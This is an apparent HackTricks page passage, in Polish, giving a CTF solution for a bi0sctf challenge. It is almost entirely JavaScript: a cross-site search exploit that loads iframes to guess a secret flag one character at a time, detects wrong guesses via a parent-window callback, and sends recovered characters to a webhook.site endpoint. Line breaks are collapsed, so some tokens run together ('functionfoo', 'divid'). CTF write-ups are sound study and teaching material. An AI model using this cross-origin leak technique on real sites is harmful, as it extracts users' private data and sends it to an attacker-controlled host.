Dziel się sztuczkami hackingowymi, przesyłając PR-y doHackTricks i HackTricks Cloud repozytoriów na githubie.
// Code that will try ${guess} as flag (need rest of the server codeapp.get('/guessing',function(req, res) {let guess =req.query.guesslet page =`<html><head><script>function foo() {// If not the flag this will be executedwindow.parent.foo()}</script><script src="https://axol.space/search?query=${guess}&hint=foo()"></script></head><p>hello2</p></html>`res.send(page)});
Strona główna, która generuje iframe'y do poprzedniej strony /guessing, aby przetestować każdą możliwość
<html><head><script>let candidateIsGood =false;let candidate =''let flag ='bi0sctf{'let guessIndex =-1let flagChars ='_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'// this will get called from our iframe IF the candidate is WRONGfunctionfoo() {candidateIsGood =false}timerId =setInterval(() => {if (candidateIsGood) {flag = candidateguessIndex =-1fetch('https://webhook.site/<yours-goes-here>?flag='+flag)}//Start with true and will be change to false if wrongcandidateIsGood =trueguessIndex++if (guessIndex >=flagChars.length) {fetch('https://webhook.site/<yours-goes-here>')return}let guess = flagChars[guessIndex]candidate = flag + guesslet iframe =`<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`console.log('iframe: ', iframe)hack.innerHTML = iframe},500);</script></head><p>hello</p><divid="hack"></div></html>